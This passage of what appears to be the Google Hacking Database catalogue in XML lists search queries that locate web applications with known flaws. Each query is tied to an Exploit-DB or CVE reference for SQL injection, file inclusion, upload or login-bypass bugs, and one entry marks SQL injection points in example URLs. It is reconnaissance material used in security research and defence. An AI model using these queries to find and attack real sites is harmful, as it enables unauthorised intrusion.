<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;MobPartner Counter&quot; &quot;upload files&quot;</shortDescription>
<textualDescription>MobPartner Counter - Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11019</textualDescription>
<query>&quot;MobPartner Counter&quot; &quot;upload files&quot;</query>
<querystring>https://www.google.com/search?q=%22MobPartner+Counter%22+%22upload+files%22</querystring>
<edb>https://www.exploit-db.com/exploits/11019</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2757</id>
<link>https://www.exploit-db.com/ghdb/2757</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Multi-Page Comment System&quot;</shortDescription>
<textualDescription>Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 2008-2293: https://www.exploit-db.com/exploits/5630</textualDescription>
<query>&quot;Multi-Page Comment System&quot;</query>
<querystring>https://www.google.com/search?q=%22Multi-Page+Comment+System%22</querystring>
<edb>https://www.exploit-db.com/exploits/5630</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3188</id>
<link>https://www.exploit-db.com/ghdb/3188</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;mumbo jumbo media&quot; + inurl:&quot;index.php&quot;</shortDescription>
<textualDescription>Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: https://www.exploit-db.com/exploits/5440</textualDescription>
<query>&quot;mumbo jumbo media&quot; + inurl:&quot;index.php&quot;</query>
<querystring>https://www.google.com/search?q=%22mumbo+jumbo+media%22+%2B+inurl:%22index.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5440</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1854</id>
<link>https://www.exploit-db.com/ghdb/1854</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;MunzurSoft Wep Portal W3&quot;</shortDescription>
<textualDescription>MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: https://www.exploit-db.com/exploits/6725</textualDescription>
<query>&quot;MunzurSoft Wep Portal W3&quot;</query>
<querystring>https://www.google.com/search?q=%22MunzurSoft+Wep+Portal+W3%22</querystring>
<edb>https://www.exploit-db.com/exploits/6725</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2912</id>
<link>https://www.exploit-db.com/ghdb/2912</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;My Photo v1.46.4 © Big Resources&quot;</shortDescription>
<textualDescription>Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7645</textualDescription>
<query>&quot;My Photo v1.46.4 © Big Resources&quot;</query>
<querystring>https://www.google.com/search?q=%22My+Photo+v1.46.4+%C3%82%C2%A9+Big+Resources%22</querystring>
<edb>https://www.exploit-db.com/exploits/7645</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1157</id>
<link>https://www.exploit-db.com/ghdb/1157</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;News generated by Utopia News Pro&quot; | &quot;Powered By: Utopia News Pro&quot;</shortDescription>
<textualDescription>Utopia News Pro 1.1.3 (and prior versions) SQL Injection &amp; XSSadvisory &amp; poc exploit:http://rgod.altervista.org/utopia113.html</textualDescription>
<query>&quot;News generated by Utopia News Pro&quot; | &quot;Powered By: Utopia News Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22News+generated+by+Utopia+News+Pro%22+%7C+%22Powered+By%3A+Utopia+News+Pro%22</querystring>
<edb></edb>
<date>2005-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1987</id>
<link>https://www.exploit-db.com/ghdb/1987</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;News Managed by Ditto News&quot;</shortDescription>
<textualDescription>Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/1887</textualDescription>
<query>&quot;News Managed by Ditto News&quot;</query>
<querystring>https://www.google.com/search?q=%22News+Managed+by+Ditto+News%22</querystring>
<edb>https://www.exploit-db.com/exploits/1887</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3368</id>
<link>https://www.exploit-db.com/ghdb/3368</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;nukeai beta3&quot;</shortDescription>
<textualDescription>PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: https://www.exploit-db.com/exploits/2843</textualDescription>
<query>&quot;nukeai beta3&quot;</query>
<querystring>https://www.google.com/search?q=%22nukeai+beta3%22</querystring>
<edb>https://www.exploit-db.com/exploits/2843</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>687</id>
<link>https://www.exploit-db.com/ghdb/687</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Obtenez votre forum Aztek&quot; -site:forum-aztek.com</shortDescription>
<textualDescription>Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654</textualDescription>
<query>&quot;Obtenez votre forum Aztek&quot; -site:forum-aztek.com</query>
<querystring>https://www.google.com/search?q=%22Obtenez+votre+forum+Aztek%22+-site%3Aforum-aztek.com&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>547</id>
<link>https://www.exploit-db.com/ghdb/547</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Online Store - Powered by ProductCart&quot;</shortDescription>
<textualDescription>ProductCart is &quot;an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites&quot;. Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)</textualDescription>
<query>&quot;Online Store - Powered by ProductCart&quot;</query>
<querystring>https://www.google.com/search?hl=es&amp;q=%22Online+Store+-+Powered+by+ProductCart%22+</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3592</id>
<link>https://www.exploit-db.com/ghdb/3592</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Page created in&quot; &quot;seconds by glFusion&quot; +RSS</shortDescription>
<textualDescription>CVE: 2009-1281
EDB-ID: 8347
This search can potentially identify vulnerable installations of glFusion.
https://www.exploit-db.com/exploits/8347</textualDescription>
<query>&quot;Page created in&quot; &quot;seconds by glFusion&quot; +RSS</query>
<querystring>https://www.google.com/search?q=%22Page+created+in%22+%22seconds+by+glFusion%22++%2BRSS</querystring>
<edb>https://www.exploit-db.com/exploits/8347</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2761</id>
<link>https://www.exploit-db.com/ghdb/2761</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;pages.php?page_ID=&quot; &quot;K9 Kreativity&quot;</shortDescription>
<textualDescription>K9 Kreativity Design (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12866</textualDescription>
<query>&quot;pages.php?page_ID=&quot; &quot;K9 Kreativity&quot;</query>
<querystring>https://www.google.com/search?q=%22pages.php%3Fpage_ID%3D%22+%22K9+Kreativity%22</querystring>
<edb>https://www.exploit-db.com/exploits/12866</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2491</id>
<link>https://www.exploit-db.com/ghdb/2491</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ParsBlogger ? 2006. All rights reserved&quot;</shortDescription>
<textualDescription>ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6745</textualDescription>
<query>&quot;ParsBlogger ? 2006. All rights reserved&quot;</query>
<querystring>https://www.google.com/search?q=%22ParsBlogger++%3F+2006.+All+rights+reserved%22</querystring>
<edb>https://www.exploit-db.com/exploits/6745</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3510</id>
<link>https://www.exploit-db.com/ghdb/3510</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Personal .NET Portal&quot; </shortDescription>
<textualDescription>Personal.Net Portal Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15067</textualDescription>
<query>&quot;Personal .NET Portal&quot;</query>
<querystring>https://www.google.com/search?q=%22Personal+.NET+Portal%22</querystring>
<edb>https://www.exploit-db.com/exploits/15067</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2037</id>
<link>https://www.exploit-db.com/ghdb/2037</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;pForum 1.29a&quot; OR &quot;&quot;Powie's PSCRIPT Forum 1.26&quot;</shortDescription>
<textualDescription>Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: https://www.exploit-db.com/exploits/2797</textualDescription>
<query>&quot;pForum 1.29a&quot; OR &quot;&quot;Powie's PSCRIPT Forum 1.26&quot;</query>
<querystring>https://www.google.com/search?q=%22pForum+1.29a%22++OR+%22%22Powie's+PSCRIPT+Forum+1.26%22</querystring>
<edb>https://www.exploit-db.com/exploits/2797</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2291</id>
<link>https://www.exploit-db.com/ghdb/2291</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;pForum 1.30&quot;</shortDescription>
<textualDescription>pForum 1.30 (showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: https://www.exploit-db.com/exploits/6442</textualDescription>
<query>&quot;pForum 1.30&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22pForum+1.30%22</querystring>
<edb>https://www.exploit-db.com/exploits/6442</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2774</id>
<link>https://www.exploit-db.com/ghdb/2774</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP BP Team&quot;</shortDescription>
<textualDescription>phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: https://www.exploit-db.com/exploits/5263</textualDescription>
<query>&quot;PHP BP Team&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+BP+Team%22</querystring>
<edb>https://www.exploit-db.com/exploits/5263</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3386</id>
<link>https://www.exploit-db.com/ghdb/3386</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Easy Downloader&quot;</shortDescription>
<textualDescription>PHP Easy Downloader 1.5 (save.php) Remote Code Execution: https://www.exploit-db.com/exploits/2812</textualDescription>
<query>&quot;PHP Easy Downloader&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Easy+Downloader%22</querystring>
<edb>https://www.exploit-db.com/exploits/2812</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2695</id>
<link>https://www.exploit-db.com/ghdb/2695</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</shortDescription>
<textualDescription>Free PHP photo gallery script Remote File inclusion Vulnerability: https://www.exploit-db.com/exploits/14438</textualDescription>
<query>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22</querystring>
<edb>https://www.exploit-db.com/exploits/14438</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2702</id>
<link>https://www.exploit-db.com/ghdb/2702</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</shortDescription>
<textualDescription>ValidForm Builder script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14454</textualDescription>
<query>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22</querystring>
<edb>https://www.exploit-db.com/exploits/14454</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2737</id>
<link>https://www.exploit-db.com/ghdb/2737</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</shortDescription>
<textualDescription>Free PHP photo gallery script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14437</textualDescription>
<query>&quot;PHP Gallery © 2010 PHP Weby hostgator coupon&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Gallery+%C2%A9+2010+PHP+Weby+hostgator+coupon%22</querystring>
<edb>https://www.exploit-db.com/exploits/14437</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2836</id>
<link>https://www.exploit-db.com/ghdb/2836</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Link Portal v1.95.1 © Big Resources, Inc.&quot;</shortDescription>
<textualDescription>Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7644</textualDescription>
<query>&quot;PHP Link Portal v1.95.1 © Big Resources, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Link+Portal+v1.95.1+%C3%82%C2%A9+Big+Resources%2C+Inc.%22</querystring>
<edb>https://www.exploit-db.com/exploits/7644</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3355</id>
<link>https://www.exploit-db.com/ghdb/3355</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Project Management 0.8.10&quot;</shortDescription>
<textualDescription>PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: https://www.exploit-db.com/exploits/4549</textualDescription>
<query>&quot;PHP Project Management 0.8.10&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+Project+Management+0.8.10%22</querystring>
<edb>https://www.exploit-db.com/exploits/4549</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>7314</id>
<link>https://www.exploit-db.com/ghdb/7314</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP Projectworlds 1.0&quot;</shortDescription>
<textualDescription># Google Dork: &quot;PHP Projectworlds 1.0&quot;
# Advisories and Vulnerabilities
# Date: 18/08/2021
# Exploit Author: Tanmay Bhattacharjee</textualDescription>
<query>&quot;PHP Projectworlds 1.0&quot;</query>
<querystring>https://www.google.com/search?q=&quot;PHP Projectworlds 1.0&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>2636</id>
<link>https://www.exploit-db.com/ghdb/2636</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHP WEBQUEST VERSION &quot; or inurl:&quot;/phpwebquest/&quot;</shortDescription>
<textualDescription>PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: https://www.exploit-db.com/exploits/4872</textualDescription>
<query>&quot;PHP WEBQUEST VERSION &quot; or inurl:&quot;/phpwebquest/&quot;</query>
<querystring>https://www.google.com/search?q=%22PHP+WEBQUEST+VERSION+%22+or+inurl:%22/phpwebquest/%22</querystring>
<edb>https://www.exploit-db.com/exploits/4872</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3252</id>
<link>https://www.exploit-db.com/ghdb/3252</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;php-addressbook&quot; </shortDescription>
<textualDescription>PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: https://www.exploit-db.com/exploits/9023</textualDescription>
<query>&quot;php-addressbook&quot;</query>
<querystring>https://www.google.com/search?q=%22php-addressbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/9023</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1816</id>
<link>https://www.exploit-db.com/ghdb/1816</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHPAuction GPL Enhanced V2.51 by AuctionCode.com&quot;</shortDescription>
<textualDescription>Auction_Software Script Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/14247</textualDescription>
<query>&quot;PHPAuction GPL Enhanced V2.51 by AuctionCode.com&quot;</query>
<querystring>https://www.google.com/search?q=%22PHPAuction+GPL+Enhanced+V2.51+by+AuctionCode.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/14247</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1321</id>
<link>https://www.exploit-db.com/ghdb/1321</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PhpCollab . Log In&quot; | &quot;NetOffice . Log In&quot; | (intitle:&quot;index.of.&quot; intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)</shortDescription>
<textualDescription>this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html</textualDescription>
<query>&quot;PhpCollab . Log In&quot; | &quot;NetOffice . Log In&quot; | (intitle:&quot;index.of.&quot; intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)</query>
<querystring>https://www.google.com/search?q=%22PhpCollab+.+Log+In%22+%7C+%22NetOffice+.+Log+In%22+%7C+(intitle:%22index.of.%22+intitle:phpcollab%7Cnetoffice+inurl:phpcollab%7Cnetoffice+-gentoo)+&amp;num=100&amp;start=&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>2975</id>
<link>https://www.exploit-db.com/ghdb/2975</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHPGlossar Version 0.8&quot;</shortDescription>
<textualDescription>PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities - CVE: 2007-2751: https://www.exploit-db.com/exploits/3941</textualDescription>
<query>&quot;PHPGlossar Version 0.8&quot;</query>
<querystring>https://www.google.com/search?q=%22PHPGlossar+Version+0.8%22</querystring>
<edb>https://www.exploit-db.com/exploits/3941</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2047</id>
<link>https://www.exploit-db.com/ghdb/2047</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PhpLinkExchange v1.02&quot;</shortDescription>
<textualDescription>PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: https://www.exploit-db.com/exploits/10495</textualDescription>
<query>&quot;PhpLinkExchange v1.02&quot;</query>
<querystring>https://www.google.com/search?q=%22PhpLinkExchange+v1.02%22</querystring>
<edb>https://www.exploit-db.com/exploits/10495</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2878</id>
<link>https://www.exploit-db.com/ghdb/2878</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHPNews Version 0.93&quot;</shortDescription>
<textualDescription>PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: https://www.exploit-db.com/exploits/4268</textualDescription>
<query>&quot;PHPNews Version 0.93&quot;</query>
<querystring>https://www.google.com/search?q=%22PHPNews+Version+0.93%22</querystring>
<edb>https://www.exploit-db.com/exploits/4268</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3085</id>
<link>https://www.exploit-db.com/ghdb/3085</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;phpQuestionnaire v3&quot;</shortDescription>
<textualDescription>phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: https://www.exploit-db.com/exploits/2410</textualDescription>
<query>&quot;phpQuestionnaire v3&quot;</query>
<querystring>https://www.google.com/search?q=%22phpQuestionnaire+v3%22</querystring>
<edb>https://www.exploit-db.com/exploits/2410</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2719</id>
<link>https://www.exploit-db.com/ghdb/2719</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PHPWebAdmin for hMailServer&quot; intitle:PHPWebAdmin -site:hmailserver.com</shortDescription>
<textualDescription>hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/7012</textualDescription>
<query>&quot;PHPWebAdmin for hMailServer&quot; intitle:PHPWebAdmin -site:hmailserver.com</query>
<querystring>https://www.google.com/search?q=%22PHPWebAdmin+for+hMailServer%22+intitle:PHPWebAdmin+-site:hmailserver.com</querystring>
<edb>https://www.exploit-db.com/exploits/7012</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2626</id>
<link>https://www.exploit-db.com/ghdb/2626</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PKs Movie Database&quot;</shortDescription>
<textualDescription>PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/5095</textualDescription>
<query>&quot;PKs Movie Database&quot;</query>
<querystring>https://www.google.com/search?q=%22PKs+Movie+Database%22</querystring>
<edb>https://www.exploit-db.com/exploits/5095</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1003</id>
<link>https://www.exploit-db.com/ghdb/1003</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;portailphp v1.3&quot; inurl:&quot;index.php?affiche&quot; inurl:&quot;PortailPHP&quot; -site:safari-msi.com</shortDescription>
<textualDescription>Vulnerability has been found in parameter &quot;id&quot;. If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of themAre vulnerable.It occurs because of absence of a filtration of parameter id.Exampleshttp://example/index.php?affiche=News&amp;id='[SQL inj]http://example/index.php?affiche=File&amp;id='[SQL inj]http://example/index.php?affiche=Liens&amp;id='[SQL inj]http://example/index.php?affiche=Faq&amp;id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable.</textualDescription>
<query>&quot;portailphp v1.3&quot; inurl:&quot;index.php?affiche&quot; inurl:&quot;PortailPHP&quot; -site:safari-msi.com</query>
<querystring>https://www.google.com/search?q=%22portailphp+v1.3%22+inurl:%22index.php%3Faffiche%22+inurl:%22PortailPHP%22+-site:safari-msi.com&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>3154</id>
<link>https://www.exploit-db.com/ghdb/3154</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Power by Blakord Portal&quot;</shortDescription>
<textualDescription>Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: https://www.exploit-db.com/exploits/4793</textualDescription>
<query>&quot;Power by Blakord Portal&quot;</query>
<querystring>https://www.google.com/search?q=%22Power+by+Blakord+Portal%22</querystring>
<edb>https://www.exploit-db.com/exploits/4793</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3348</id>
<link>https://www.exploit-db.com/ghdb/3348</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Power by:RichStrong CMS&quot;</shortDescription>
<textualDescription>RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: https://www.exploit-db.com/exploits/4910</textualDescription>
<query>&quot;Power by:RichStrong CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Power+by:RichStrong+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/4910</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2125</id>
<link>https://www.exploit-db.com/ghdb/2125</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powerd by www.e-webtech.com&quot;</shortDescription>
<textualDescription>e-webtech (new.asp?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12547</textualDescription>
<query>&quot;Powerd by www.e-webtech.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Powerd+by+www.e-webtech.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/12547</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2640</id>
<link>https://www.exploit-db.com/ghdb/2640</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powerd by www.e-webtech.com&quot;</shortDescription>
<textualDescription>e-webtech (page.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12571</textualDescription>
<query>&quot;Powerd by www.e-webtech.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Powerd+by+www.e-webtech.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/12571</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>480</id>
<link>https://www.exploit-db.com/ghdb/480</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered *: newtelligence&quot; (&quot;dasBlog 1.6&quot;| &quot;dasBlog 1.5&quot;| &quot;dasBlog 1.4&quot;|&quot;dasBlog 1.3&quot;)</shortDescription>
<textualDescription>DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/</textualDescription>
<query>&quot;Powered *: newtelligence&quot; (&quot;dasBlog 1.6&quot;| &quot;dasBlog 1.5&quot;| &quot;dasBlog 1.4&quot;|&quot;dasBlog 1.3&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Powered+*%3A+newtelligence%22+%28%22dasBlog+1.6%22%7C+%22dasBlog+1.5%22%7C+%22dasBlog+1.4%22%7C%22dasBlog+1.3%22%29</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>2260</id>
<link>https://www.exploit-db.com/ghdb/2260</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By 0DayDB v2.3&quot;</shortDescription>
<textualDescription>0DayDB 2.3 (delete id) Remote Admin Bypass: https://www.exploit-db.com/exploits/4896</textualDescription>
<query>&quot;Powered By 0DayDB v2.3&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+By+0DayDB+v2.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/4896</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4877</id>
<link>https://www.exploit-db.com/ghdb/4877</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by 2Moons&quot;</shortDescription>
<textualDescription>Find websites using 2Moons ogame software.
https://www.exploit-db.com/exploits/37713/</textualDescription>
<query>&quot;Powered by 2Moons&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by 2Moons&quot;</querystring>
<edb></edb>
<date>2018-06-27</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>1310</id>
<link>https://www.exploit-db.com/ghdb/1310</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by 4images&quot;</shortDescription>
<textualDescription>this is for 4images</textualDescription>
<query>&quot;powered by 4images&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+4images%22+&amp;num=100&amp;start=100&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1905</id>
<link>https://www.exploit-db.com/ghdb/1905</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By 4smart&quot;</shortDescription>
<textualDescription>Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: https://www.exploit-db.com/exploits/9283</textualDescription>
<query>&quot;Powered By 4smart&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+4smart%22</querystring>
<edb>https://www.exploit-db.com/exploits/9283</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2298</id>
<link>https://www.exploit-db.com/ghdb/2298</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By 4smart&quot;</shortDescription>
<textualDescription>Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9282</textualDescription>
<query>&quot;Powered By 4smart&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+By+4smart%22</querystring>
<edb>https://www.exploit-db.com/exploits/9282</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1831</id>
<link>https://www.exploit-db.com/ghdb/1831</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by 68kb&quot;</shortDescription>
<textualDescription>68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: https://www.exploit-db.com/exploits/11925</textualDescription>
<query>&quot;Powered by 68kb&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+68kb%22</querystring>
<edb>https://www.exploit-db.com/exploits/11925</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1666</id>
<link>https://www.exploit-db.com/ghdb/1666</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by : elkagroup.com&quot;</shortDescription>
<textualDescription>elkagroup (pid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10836</textualDescription>
